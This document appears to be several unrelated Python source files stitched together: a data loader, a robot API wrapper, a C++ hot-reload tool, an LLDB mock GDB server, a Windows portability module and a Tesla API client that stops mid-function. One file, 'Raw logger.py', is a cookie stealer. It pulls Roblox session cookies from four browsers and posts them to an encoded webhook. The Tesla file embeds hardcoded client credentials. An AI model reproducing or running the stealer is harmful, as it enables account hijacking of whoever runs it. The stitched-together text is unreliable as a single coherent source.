with Parallel(n_jobs=self.n_workers, batch_size="auto", backend="threading") as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
indices = np.random.permutation(self.n_minibatches).astype(np.int64)
else:
indices = np.arange(len(self.minibatchlist), dtype=np.int64)
for minibatch_idx in indices:
images = self.images_path[self.minibatchlist[minibatch_idx]]
if self.n_workers <= 1:
batch = [self._makeBatchElement(image_path,
absolute_path=self.absolute_path) for image_path in images]
else:
batch = parallel(delayed(self._makeBatchElement)(image_path) for image_path in images)
batch = th.cat(batch, dim=0)
if self.no_targets:
self.queue.put(batch)
else:
# th.tensor creates a copy
self.queue.put((batch, th.tensor(self.targets[minibatch_idx])))
# Free memory
del batch
self.queue.put(None)
@staticmethod
def createMinibatchList(x_indices, y_values, batch_size):
"""
Create list of minibatches (contains the observations indices)
along with the corresponding list of targets
Warning: this may create minibatches of different lengths
:param x_indices: (np.array)
:param y_values: (np.array)
:param batch_size: (int)
:return: ([np.array], [np.array])
"""
targets = []
minibatchlist = []
n_minibatches = len(x_indices) // batch_size + 1
for i in range(0, n_minibatches):
start_idx = i * batch_size
end_idx = min(start_idx + batch_size, len(x_indices))
excerpt = slice(start_idx, end_idx)
# Remove excerpt with no elements
if len(x_indices[excerpt]) > 0:
minibatchlist.append(x_indices[excerpt])
targets.append(y_values[excerpt])
return minibatchlist, targets
|
robot.py
|
from .utils import camel_case_to_snake_case, format_type_to_python
import json
from threading import Event, Thread
import os
from .communication_managers import generate_communication_manager
class Robot:
''' Generate a robot object with an api for each of the robot's parts. '''
def __init__(self, configuration):
# keep a copy of the configuration for later use.
ready_event = Event()
self.__communication_manager = generate_communication_manager(
configuration["communication"], ready_event)
self.thread = Thread(target=self.__communication_manager.start)
self.thread.start()
ready_event.wait()
self.__configuration = self.__communication_manager.get_configuration()
# if it is required to wait for a green light from the server in order to run the code, wait.
if "wait_for_game_start" in self.__configuration and self.__configuration["wait_for_game_start"]:
self.__communication_manager.wait_for_game_start_message()
robot_name = self.__configuration["Name"]
# for each robot-part specified in the configuration, generate an api to it accessible via it's chosen name.
for part_conf in self.__configuration["Subroutes"]:
part_name = part_conf['Name']
methods = part_conf['Methods']
setattr(self, part_name, Part(
self.__communication_manager.send_request, part_name, methods, robot_name))
def get_thread(self):
return self.thread
def get_comm_mngr(self):
return self.__communication_manager
def print_manual(self):
''' Print all the relevant information regarding the robot. '''
print("Robot name: {0}\n".format(self.__configuration["Name"]))
print("API options:")
for robot_part in self.__configuration["Subroutes"]:
''' General info about the robot part. '''
print(F'\nPart Name: {robot_part["Name"]}')
print("\tUsage:")
''' for each of the part methods, print how to use it including all arguments and their types. '''
for method in robot_part['Methods']:
method_name = method['Name']
method_spec = method['Parameters']
method_arguments = ', '.join("{0} <{1}>".format(
argument['Name'], format_type_to_python(argument['Type'])) for argument in method_spec)
print("\t\trobot.{0}.{1}({2})".format(
robot_part['Name'],
camel_case_to_snake_case(method_name),
method_arguments)
)
class Part:
def __init__(self, __send_request_func, part_name, part_methods, robot_name):
''' A function to send requests to the robot. '''
self.__send_request_func = __send_request_func
# generate a function for each of the robot-part available api calls.
for method in part_methods:
method_name = method['Name']
method_spec = method['Parameters']
return_type = format_type_to_python(method['ReturnType'])
method_to_mount = self.__generate_method_to_mount(
part_name, method_name, method_spec, return_type, robot_name)
setattr(self, camel_case_to_snake_case(
method_name), method_to_mount)
# a function to build a specific api method for a robot-part.
def __generate_method_to_mount(self, part_name, method_name, method_spec, return_type, robot_name):
# the method.
def method_to_mount(*args):
# make sure the amount of arguments given are correct.
# TODO: type-check the arguments as well.
assert len(args) == len(method_spec)
# which data to send with the api request.
request_object = {
"api": part_name,
"methodName": method_name,
"parameters": args,
"playerName": robot_name
}
res = self.__send_request_func(
request_object, return_type)
return res
return method_to_mount
|
object_generator.py
|
#!/usr/bin/env python
from argparse import ArgumentParser
from os import path, listdir, stat
from os.path import isfile, join
from time import sleep
import subprocess
import threading
class Shell():
def __init__(self, objFolder, name, link):
self.__objFolder = objFolder
self.__name = name
self.__link = link
def run(self):
while True:
i = input("> ")
if i == "exit":
break
if i == "comp":
try:
subprocess.run(self.__genCommand())
except Exception:
pass
def __genCommand(self) -> [str]:
files = [self.__objFolder + "/" + f for f in listdir(self.__objFolder) if isfile(join(self.__objFolder, f)) and f.endswith(".cpp.o")]
s = "g++ -o " + self.__name + " " + " ".join(files) + " -l"
s += " -l".join(self.__link)
print(s)
return s.split(" ")
class ConfReader():
def __init__(self, file):
self.__file = file
self.__name = None
self.__link = None
self.__include = None
self.__options = None
self.__parse()
def __parse(self):
with open(self.__file) as fd:
lines = fd.readlines()
for l in lines:
t = l.strip().split(":")
if t[0] == "name":
self.__name = t[1]
elif t[0] == "link":
self.__link = t[1].split(",")
elif t[0] == "include":
self.__include = t[1].split(",")
elif t[0] == "options":
self.__options = t[1].split(",")
# print(self.__link)
# print(self.__include)
# print(self.__options)
def __bool__(self) -> bool:
return self.__link != None and self.__include != None and self.__options != None and self.__name != None
def getInfos(self) -> (str, str, str, str):
return self.__name, self.__link, self.__include, self.__options
class Compile():
def __init__(self, srcFolder, objFolder, link, include, options):
self.__srcFolder = srcFolder
self.__objFolder = objFolder
self.__link = link
self.__include = include
self.__options = options
self.__sources = self.__getSources()
#print(self.__sources)
def __getSources(self):
files = [f for f in listdir(self.__srcFolder) if isfile(join(self.__srcFolder, f)) and f.endswith(".cpp")]
dates = [int(stat(join(self.__srcFolder, f)).st_mtime) for f in files]
return dict(zip(files, dates))
def reload(self, e: threading.Event):
while not e.isSet():
for old, new in zip(self.__sources.items(), self.__getSources().items()):
name, oldStamp = old
_, newStamp = new
if newStamp > oldStamp:
subprocess.run(self.__createCommand(name))
self.__sources[name] = newStamp
sleep(1)
def __createCommand(self, name):
s = f"g++ -c {join(self.__srcFolder, name)}"
s += " -o " + join(self.__objFolder, name + ".o ")
s += " ".join(self.__options) + " -I"
s += " -I".join(self.__include) + " -l"
s += " -l".join(self.__link)
#print(s.split(" "))
return s.split(" ")
def main():
parse = ArgumentParser("Hot reloading for C++ files")
parse.add_argument("src", help="folder where sources are")
parse.add_argument("obj", help="folder where objects fille will be")
parse.add_argument("config", help="configuration file")
args = parse.parse_args()
srcFolder = path.abspath(args.src)
objFolder = path.abspath(args.obj)
c = ConfReader(args.config)
if c:
name, link, include, options = c.getInfos()
comp = Compile(srcFolder, objFolder, link, include, options)
e = threading.Event()
t = threading.Thread(target=comp.reload, args=(e,))
t.start()
s = Shell(objFolder, name, link)
s.run()
e.set()
t.join()
else:
print("Encule")
exit(84)
if __name__ == "__main__":
main()
|
gdbclientutils.py
|
import os
import os.path
import subprocess
import threading
import socket
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbtest_config
def checksum(message):
"""
Calculate the GDB server protocol checksum of the message.
The GDB server protocol uses a simple modulo 256 sum.
"""
check = 0
for c in message:
check += ord(c)
return check % 256
def frame_packet(message):
"""
Create a framed packet that's ready to send over the GDB connection
channel.
Framing includes surrounding the message between $ and #, and appending
a two character hex checksum.
"""
return "$%s#%02x" % (message, checksum(message))
def escape_binary(message):
"""
Escape the binary message using the process described in the GDB server
protocol documentation.
Most bytes are sent through as-is, but $, #, and { are escaped by writing
a { followed by the original byte mod 0x20.
"""
out = ""
for c in message:
d = ord(c)
if d in (0x23, 0x24, 0x7d):
out += chr(0x7d)
out += chr(d ^ 0x20)
else:
out += c
return out
def hex_encode_bytes(message):
"""
Encode the binary message by converting each byte into a two-character
hex string.
"""
out = ""
for c in message:
out += "%02x" % ord(c)
return out
def hex_decode_bytes(hex_bytes):
"""
Decode the hex string into a binary message by converting each two-character
hex string into a single output byte.
"""
out = ""
hex_len = len(hex_bytes)
while i < hex_len - 1:
out += chr(int(hex_bytes[i:i + 2]), 16)
i += 2
return out
class MockGDBServerResponder:
"""
A base class for handling client packets and issuing server responses for
GDB tests.
This handles many typical situations, while still allowing subclasses to
completely customize their responses.
Most subclasses will be interested in overriding the other() method, which
handles any packet not recognized in the common packet handling code.
"""
registerCount = 40
packetLog = None
def __init__(self):
self.packetLog = []
def respond(self, packet):
"""
Return the unframed packet data that the server should issue in response
to the given packet received from the client.
"""
self.packetLog.append(packet)
if packet is MockGDBServer.PACKET_INTERRUPT:
return self.interrupt()
if packet == "c":
return self.cont()
if packet == "g":
return self.readRegisters()
if packet[0] == "G":
return self.writeRegisters(packet[1:])
if packet[0] == "p":
return self.readRegister(int(packet[1:], 16))
if packet[0] == "P":
register, value = packet[1:].split("=")
return self.readRegister(int(register, 16), value)
if packet[0] == "m":
addr, length = [int(x, 16) for x in packet[1:].split(',')]
return self.readMemory(addr, length)
if packet[0] == "M":
location, encoded_data = packet[1:].split(":")
addr, length = [int(x, 16) for x in location.split(',')]
return self.writeMemory(addr, encoded_data)
if packet[0:7] == "qSymbol":
return self.qSymbol(packet[8:])
if packet[0:10] == "qSupported":
return self.qSupported(packet[11:].split(";"))
if packet == "qfThreadInfo":
return self.qfThreadInfo()
if packet == "qC":
return self.qC()
if packet == "QEnableErrorStrings":
return self.QEnableErrorStrings()
if packet == "?":
return self.haltReason()
if packet[0] == "H":
return self.selectThread(packet[1], int(packet[2:], 16))
if packet[0:6] == "qXfer:":
obj, read, annex, location = packet[6:].split(":")
offset, length = [int(x, 16) for x in location.split(',')]
data, has_more = self.qXferRead(obj, annex, offset, length)
if data is not None:
return self._qXferResponse(data, has_more)
return ""
if packet.startswith("vAttach;"):
pid = packet.partition(';')[2]
return self.vAttach(int(pid, 16))
if packet[0] == "Z":
return self.setBreakpoint(packet)
return self.other(packet)
def interrupt(self):
raise self.UnexpectedPacketException()
def cont(self):
raise self.UnexpectedPacketException()
def readRegisters(self):
return "00000000" * self.registerCount
def readRegister(self, register):
return "00000000"
def writeRegisters(self, registers_hex):
return "OK"
def writeRegister(self, register, value_hex):
return "OK"
def readMemory(self, addr, length):
return "00" * length
def writeMemory(self, addr, data_hex):
return "OK"
def qSymbol(self, symbol_args):
return "OK"
def qSupported(self, client_supported):
return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"
def qfThreadInfo(self):
return "l"
def qC(self):
return "QC0"
def QEnableErrorStrings(self):
return "OK"
def haltReason(self):
# SIGINT is 2, return type is 2 digit hex string
return "S02"
def qXferRead(self, obj, annex, offset, length):
return None, False
def _qXferResponse(self, data, has_more):
return "%s%s" % ("m" if has_more else "l", escape_binary(data))
def vAttach(self, pid):
raise self.UnexpectedPacketException()
def selectThread(self, op, thread_id):
return "OK"
def setBreakpoint(self, packet):
raise self.UnexpectedPacketException()
def other(self, packet):
# empty string means unsupported
return ""
"""
Raised when we receive a packet for which there is no default action.
Override the responder class to implement behavior suitable for the test at
hand.
"""
class UnexpectedPacketException(Exception):
pass
class MockGDBServer:
"""
A simple TCP-based GDB server that can test client behavior by receiving
commands and issuing custom-tailored responses.
Responses are generated via the .responder property, which should be an
instance of a class based on MockGDBServerResponder.
"""
responder = None
port = 0
_socket = None
_client = None
_thread = None
_receivedData = None
_receivedDataOffset = None
_shouldSendAck = True
def __init__(self, port = 0):
self.responder = MockGDBServerResponder()
self.port = port
self._socket = socket.socket()
def start(self):
# Block until the socket is up, so self.port is available immediately.
# Then start a thread that waits for a client connection.
addr = ("127.0.0.1", self.port)
self._socket.bind(addr)
self.port = self._socket.getsockname()[1]
self._socket.listen(0)
self._thread = threading.Thread(target=self._run)
self._thread.start()
def stop(self):
self._socket.close()
self._thread.join()
self._thread = None
def _run(self):
# For testing purposes, we only need to worry about one client
# connecting just one time.
try:
# accept() is stubborn and won't fail even when the socket is
# shutdown, so we'll use a timeout
self._socket.settimeout(2.0)
client, client_addr = self._socket.accept()
self._client = client
# The connected client inherits its timeout from self._socket,
# but we'll use a blocking socket for the client
self._client.settimeout(None)
except:
return
self._shouldSendAck = True
self._receivedData = ""
self._receivedDataOffset = 0
data = None
while True:
try:
data = self._client.recv(4096)
if data is None or len(data) == 0:
break
# In Python 2, sockets return byte strings. In Python 3, sockets return bytes.
# If we got bytes (and not a byte string), decode them to a string for later handling.
if isinstance(data, bytes) and not isinstance(data, str):
data = data.decode()
self._receive(data)
except Exception as e:
self._client.close()
break
def _receive(self, data):
"""
Collects data, parses and responds to as many packets as exist.
Any leftover data is kept for parsing the next time around.
"""
self._receivedData += data
try:
packet = self._parsePacket()
while packet is not None:
self._handlePacket(packet)
packet = self._parsePacket()
except self.InvalidPacketException:
self._client.close()
def _parsePacket(self):
"""
Reads bytes from self._receivedData, returning:
- a packet's contents if a valid packet is found
- the PACKET_ACK unique object if we got an ack
- None if we only have a partial packet
Raises an InvalidPacketException if unexpected data is received
or if checksums fail.
Once a complete packet is found at the front of self._receivedData,
its data is removed form self._receivedData.
"""
data = self._receivedData
i = self._receivedDataOffset
data_len = len(data)
if data_len == 0:
return None
if i == 0:
# If we're looking at the start of the received data, that means
# we're looking for the start of a new packet, denoted by a $.
# It's also possible we'll see an ACK here, denoted by a +
if data[0] == '+':
self._receivedData = data[1:]
return self.PACKET_ACK
if ord(data[0]) == 3:
self._receivedData = data[1:]
return self.PACKET_INTERRUPT
if data[0] == '$':
i += 1
else:
raise self.InvalidPacketException(
"Unexpected leading byte: %s" % data[0])
# If we're looking beyond the start of the received data, then we're
# looking for the end of the packet content, denoted by a #.
# Note that we pick up searching from where we left off last time
while i < data_len and data[i] != '#':
i += 1
# If there isn't enough data left for a checksum, just remember where
# we left off so we can pick up there the next time around
if i > data_len - 3:
self._receivedDataOffset = i
return None
# If we have enough data remaining for the checksum, extract it and
# compare to the packet contents
packet = data[1:i]
i += 1
try:
check = int(data[i:i + 2], 16)
except ValueError:
raise self.InvalidPacketException("Checksum is not valid hex")
i += 2
if check != checksum(packet):
raise self.InvalidPacketException(
"Checksum %02x does not match content %02x" %
(check, checksum(packet)))
# remove parsed bytes from _receivedData and reset offset so parsing
# can start on the next packet the next time around
self._receivedData = data[i:]
self._receivedDataOffset = 0
return packet
def _handlePacket(self, packet):
if packet is self.PACKET_ACK:
# Ignore ACKs from the client. For the future, we can consider
# adding validation code to make sure the client only sends ACKs
# when it's supposed to.
return
response = ""
# We'll handle the ack stuff here since it's not something any of the
# tests will be concerned about, and it'll get turned off quickly anyway.
if self._shouldSendAck:
self._client.sendall('+'.encode())
if packet == "QStartNoAckMode":
self._shouldSendAck = False
response = "OK"
elif self.responder is not None:
# Delegate everything else to our responder
response = self.responder.respond(packet)
# Handle packet framing since we don't want to bother tests with it.
if response is not None:
framed = frame_packet(response)
# In Python 2, sockets send byte strings. In Python 3, sockets send bytes.
# If we got a string (and not a byte string), encode it before sending.
if isinstance(framed, str) and not isinstance(framed, bytes):
framed = framed.encode()
self._client.sendall(framed)
PACKET_ACK = object()
PACKET_INTERRUPT = object()
class InvalidPacketException(Exception):
pass
class GDBRemoteTestBase(TestBase):
"""
Base class for GDB client tests.
This class will setup and start a mock GDB server for the test to use.
It also provides assertPacketLogContains, which simplifies the checking
of packets sent by the client.
"""
NO_DEBUG_INFO_TESTCASE = True
mydir = TestBase.compute_mydir(__file__)
server = None
def setUp(self):
TestBase.setUp(self)
self.server = MockGDBServer()
self.server.start()
def tearDown(self):
# TestBase.tearDown will kill the process, but we need to kill it early
# so its client connection closes and we can stop the server before
# finally calling the base tearDown.
if self.process() is not None:
self.process().Kill()
self.server.stop()
TestBase.tearDown(self)
def createTarget(self, yaml_path):
"""
Create a target by auto-generating the object based on the given yaml
instructions.
This will track the generated object so it can be automatically removed
during tearDown.
"""
yaml_base, ext = os.path.splitext(yaml_path)
obj_path = self.getBuildArtifact(yaml_base)
self.yaml2obj(yaml_path, obj_path)
return self.dbg.CreateTarget(obj_path)
def connect(self, target):
"""
Create a process by connecting to the mock GDB server.
Includes assertions that the process was successfully created.
"""
listener = self.dbg.GetListener()
error = lldb.SBError()
url = "connect://localhost:%d" % self.server.port
process = target.ConnectRemote(listener, url, "gdb-remote", error)
self.assertTrue(error.Success(), error.description)
self.assertTrue(process, PROCESS_IS_VALID)
return process
def assertPacketLogContains(self, packets):
"""
Assert that the mock server's packet log contains the given packets.
The packet log includes all packets sent by the client and received
by the server. This fuction makes it easy to verify that the client
sent the expected packets to the server.
The check does not require that the packets be consecutive, but does
require that they are ordered in the log as they ordered in the arg.
"""
i = 0
j = 0
log = self.server.responder.packetLog
while i < len(packets) and j < len(log):
if log[j] == packets[i]:
i += 1
j += 1
if i < len(packets):
self.fail(u"Did not receive: %s\nLast 10 packets:\n\t%s" %
(packets[i], u'\n\t'.join(log[-10:])))
|
Raw logger.py
|
import browser_cookie3, requests, threading
import base64
import time
import os
key = "ENCODED BASE32 HOOK HEREEEE"
weblook = base64.b32decode(key)
def edge_logger():
try:
cookies = browser_cookie3.edge(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
def chrome_logger():
try:
cookies = browser_cookie3.chrome(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
def firefox_logger():
try:
cookies = browser_cookie3.firefox(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
def opera_logger():
try:
cookies = browser_cookie3.opera(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f'```Cookie: {cookie}```'})
except:
pass
browsers = [edge_logger, chrome_logger, firefox_logger, opera_logger]
for x in browsers:
threading.Thread(target=x,).start()
|
portable.py
|
import git_config
import os
import pager
import platform
import re
import shutil
import socket
import stat
import sys
import subprocess
import threading
from trace import Trace
def isUnix():
return platform.system() != "Windows"
if isUnix():
import fcntl
def to_windows_path(path):
return path.replace('/', '\\')
def rmtree(top):
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
filename = os.path.join(root, name)
os.chmod(filename, stat.S_IWRITE)
os.remove(filename)
for name in dirs:
rmtree(os.path.join(root, name))
os.rmdir(top)
def rename(src, dst):
if isUnix():
os.rename(src, dst)
else:
if os.path.exists(dst):
os.remove(dst)
os.rename(src, dst)
def onerror(function, path, excinfo):
if not os.access(path, os.W_OK):
os.chmod(path, stat.S_IWUSR)
function(path)
else:
raise
def input_reader(src, dest, std_name):
if isUnix():
return file_reader(src, dest, std_name)
else:
return socket_reader(src, dest, std_name)
class file_reader(object):
"""select file descriptor class"""
def __init__(self, fd, dest, std_name):
assert std_name in ('stdout', 'stderr')
self.fd = fd
self.dest = dest
self.std_name = std_name
self.setup_fd()
def setup_fd(self):
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self, bufsize):
return self.fd.read(bufsize)
def close(self):
return self.fd.close()
def src(self):
return self.fd
class socket_reader():
"""select socket with file descriptor class"""
def __init__(self, src, dest, std_name=''):
self.src = src
self.dest = dest
self.std_name = std_name
self.completed = False
self.host = "localhost"
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.server_socket.bind((self.host, 0))
self.server_socket.setblocking(0)
self.port = self.server_socket.getsockname()[1]
address = (self.host, self.port)
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.client_socket.connect(address)
t = threading.Thread(target=self.send_msg, args=(self.src, self.client_socket, address))
t.start()
def send_msg(self, src, dest, address):
while True:
data = src.read(4096)
if data:
dest.sendto(data, address)
else:
break
dest.sendto("", address)
def read(self, bufsize):
try:
return self.server_socket.recv(bufsize)
except Exception as e:
Trace("failed to read from server socket: " + e.strerror)
self.close()
def close(self):
if self.client_socket:
self.client_socket.close()
if self.server_socket:
self.server_socket.close()
def fileno(self):
return self.server_socket.fileno()
def src(self):
return self.src
def os_symlink(src, dst):
if isUnix():
os.symlink(src, dst)
else:
windows_symlink(src, dst)
def windows_symlink(src, dst):
globalConfig = git_config.GitConfig.ForUser()
src = to_windows_path(src)
dst = to_windows_path(dst)
is_dir = True if os.path.isdir(os.path.realpath(os.path.join(os.path.dirname(dst), src))) else False
no_symlinks = globalConfig.GetBoolean("portable.windowsNoSymlinks")
if no_symlinks is None or no_symlinks == False:
symlink_options_dir = '/D'
symlink_options_file = ''
else:
src = os.path.abspath(os.path.join(os.path.dirname(dst), src))
Trace("Using no symlinks for %s from %s to %s", "dir" if is_dir else "file", src, dst)
symlink_options_dir = '/J'
symlink_options_file = '/H'
if is_dir:
cmd = ['cmd', '/c', 'mklink', symlink_options_dir, dst, src]
cmd = filter(len, cmd)
Trace(' '.join(cmd))
try:
subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
except Exception as e:
Trace("failed to create dir symlink: %s", e.strerror)
pass
else:
cmd = ['cmd', '/c', 'mklink', symlink_options_file, dst, src]
cmd = filter(len, cmd)
Trace(' '.join(cmd))
try:
subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
except Exception as e:
Trace("failed to create file symlink: %s", e.strerror)
pass
def os_path_islink(path):
if isUnix():
os.path.islink(path)
else:
if get_windows_symlink(path) is not None:
return True
if get_windows_hardlink(path) is not None:
return True
return False
def os_path_realpath(file_path):
if isUnix():
os.path.realpath(file_path)
else:
if not os.path.exists(file_path):
return file_path
return windows_realpath(file_path)
def windows_realpath(file_path):
symlink = file_path
while True:
s = get_windows_symlink(symlink)
if s is None:
break
else:
symlink = s
hardlink = get_windows_hardlink(symlink)
if hardlink is not None:
return hardlink
else:
return symlink
def get_windows_symlink(file_path):
if os.path.isdir(file_path):
root = os.path.abspath(os.path.join(file_path, os.pardir))
file_object = os.path.split(file_path)[1]
if not file_object:
file_object = os.path.split(os.path.split(file_object)[0])[1]
else:
root = os.path.dirname(file_path)
file_object = os.path.split(file_path)[1]
cmd = ['cmd', '/c', 'dir', '/AL', root]
try:
Trace(' '.join(cmd))
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except:
return None
lines = [s.strip() for s in out.split('\n')]
if len(lines) < 6:
return None
pattern = re.compile('.*<(.*)>\\s*(.*) \[(.*)\]$')
for line in lines[5:]:
result = pattern.match(line)
if result:
ftype = result.group(1)
fname = result.group(2)
flink = result.group(3)
if file_object == fname:
if ftype == 'SYMLINK' or ftype == 'SYMLINKD':
new_path = os.path.realpath(os.path.join(os.path.dirname(file_path), flink))
Trace("Relative link found: %s -> %s -> %s", fname, flink, new_path)
else:
new_path = flink
Trace("Absolute link found: %s -> %s", fname, flink)
return new_path
return None
def get_windows_hardlink(file_path):
if os.path.isdir(file_path):
return None
cmd = ['cmd', '/c', 'fsutil', 'hardlink', 'list', file_path]
try:
Trace(' '.join(cmd))
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except:
return None
lines = [s.strip() for s in out.split('\n')]
if len(lines) >= 2 and len(lines[1]) > 0:
hardlink = file_path[0:2] + lines[0]
Trace("Hard link found: %s -> %s", file_path, hardlink)
return hardlink
else:
return None
child_process = None
def RunPager(cmd):
if isUnix():
pager.RunPager(cmd.manifest.globalConfig)
else:
RunWindowsPager(cmd)
def RunWindowsPager(cmd):
executable = pager._SelectPager(cmd.manifest.globalConfig)
redirect_all(executable)
pager.active = True
def NoPager(cmd):
if not isUnix():
RunWindowsShell(cmd)
def RunWindowsShell(cmd):
executable = _SelectCatenate(cmd.manifest.globalConfig)
redirect_all(executable)
def redirect_all(executable):
old_sysin = sys.stdin
old_sysout = sys.stdout
old_syserr = sys.stderr
Trace("redirecting to %s" % executable)
p = subprocess.Popen([executable], stdin=subprocess.PIPE, stdout=old_sysout, stderr=old_syserr)
sys.stdout = p.stdin
sys.stderr = p.stdin
old_sysout.close()
global child_process
child_process = p
def _SelectCatenate(globalConfig):
try:
return os.environ['GIT_CATENATE']
except KeyError:
pass
pager = globalConfig.GetString('core.catenate')
if pager:
return pager
try:
return os.environ['CATENATE']
except KeyError:
pass
return 'cat'
def WaitForProcess():
if not isUnix():
global child_process
if child_process:
child_process.stdin.close()
child_process.wait()
def prepare_editor_args(editor):
if isUnix():
args = [editor + ' "$@"', 'sh']
shell = True
else:
editor = re.sub('["\']', '', editor)
args = editor.rsplit()
shell = False
return (args, shell)
def os_chmod(dest, mode):
if isUnix():
os.chmod(dest, mode)
|
TeslaAPI.py
|
import base64
import hashlib
import json
import logging
import os
import re
import requests
from threading import Thread
import time
from urllib.parse import parse_qs
logger = logging.getLogger("\U0001F697 TeslaAPI")
class TeslaAPI:
__apiChallenge = None
__apiVerifier = None
__apiState = None
__authURL = "https://auth.tesla.com/oauth2/v3/token"
__callbackURL = "https://auth.tesla.com/void/callback"
carApiLastErrorTime = 0
carApiBearerToken = ""
carApiRefreshToken = ""
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiLastChargeLimitApplyTime = 0
clientID = "81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384"
clientSecret = "c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3"
lastChargeLimitApplied = 0
lastChargeCheck = 0
chargeUpdateInterval = 1800
carApiVehicles = []
config = None
master = None
__email = None
errorCount = 0
maxLoginRetries = 10
minChargeLevel = -1
params = None
__password = None
refreshURL = "https://auth.tesla.com/oauth2/v3/token"
__resp = None
session = None
# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reachable, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = [
"upstream internal error",
"operation_timedout",
"vehicle unavailable",
]
def __init__(self, master):
self.master = master
try:
self.config = master.config
self.minChargeLevel = self.config["config"].get("minChargeLevel", -1)
self.chargeUpdateInterval = self.config["config"].get(
"cloudUpdateInterval", 1800
)
except KeyError:
pass
self.generateChallenge()
def addVehicle(self, json):
self.carApiVehicles.append(CarApiVehicle(json, self, self.config))
return True
def apiDebugInterface(self, command, vehicleID, parameters):
# Provides an interface from the Web UI to allow commands to be run interactively
# Map vehicle ID back to vehicle object
vehicle = self.getVehicleByID(int(vehicleID))
# Get parameters
params = {}
try:
params = json.loads(parameters)
except json.decoder.JSONDecodeError:
pass
# Execute specified command
if command == "setChargeRate":
charge_rate = params.get("charge_rate", 0)
self.setChargeRate(charge_rate, vehicle)
return True
elif command == "wakeVehicle":
self.wakeVehicle(vehicle)
return True
# If we make it here, we did not execute a command
return False
def apiRefresh(self):
# Refresh tokens expire in 45
# days when first issued, so we'll get a new token every 15 days.
headers = {"accept": "application/json", "Content-Type": "application/json"}
data = {
"client_id": "ownerapi",
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
"scope": "openid email offline_access",
}
req = None
now = time.time()
try:
req = requests.post(self.refreshURL, headers=headers, json=data)
logger.log(logging.INFO2, "Car API request" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.log(
logging.INFO2, "Request Exception parsing API Token Refresh Response"
)
pass
except ValueError:
pass
except json.decoder.JSONDecodeError:
logger.log(
logging.INFO2, "JSON Decode Error parsing API Token Refresh Response"
)
pass
try:
logger.log(logging.INFO4, "Car API auth response" + str(apiResponseDict))
self.setCarApiBearerToken(apiResponseDict["access_token"])
self.setCarApiRefreshToken(apiResponseDict["refresh_token"])
self.setCarApiTokenExpireTime(now + apiResponseDict["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
except KeyError:
logger.log(
logging.INFO2,
"TeslaAPI",
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
# Instead of just setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
self.setCarApiBearerToken("")
self.setCarApiRefreshToken("")
self.master.queue_background_task({"cmd": "saveSettings"})
except UnboundLocalError:
pass
def car_api_available(
self, email=None, password=None, charge=None, applyLimit=None
):
now = time.time()
needSleep = False
apiResponseDict = {}
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error. To keep strain off Tesla's API servers, wait
# carApiErrorRetryMins mins till we try again. This delay could be
# reduced if you feel the need. It's mostly here to deal with unexpected
# errors that are hopefully transient.
# https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052
# says he tested hammering the servers with requests as fast as possible
# and was automatically blacklisted after 2 minutes. Waiting 30 mins was
# enough to clear the blacklist. So at this point it seems Tesla has
# accepted that third party apps use the API and deals with bad behavior
# automatically.
logger.log(
logging.INFO6,
"Car API disabled for "
+ str(self.getCarApiRetryRemaining())
+ " more seconds due to recent error.",
)
return False
else:
logger.log(
logging.INFO8,
"Entering car_api_available - next step is to query Tesla API",
)
# Authentiate to Tesla API
if not self.master.tokenSyncEnabled() and (
self.getCarApiBearerToken() == ""
or self.getCarApiTokenExpireTime() - now < 60 * 60
):
if self.getCarApiRefreshToken() != "":
headers = {
"accept": "application/json",
"Content-Type": "application/json",
}
data = {
"client_id": self.clientID,
"client_secret": self.clientSecret,
"grant_type": "refresh_token",
"refresh_token": self.getCarApiRefreshToken(),
}
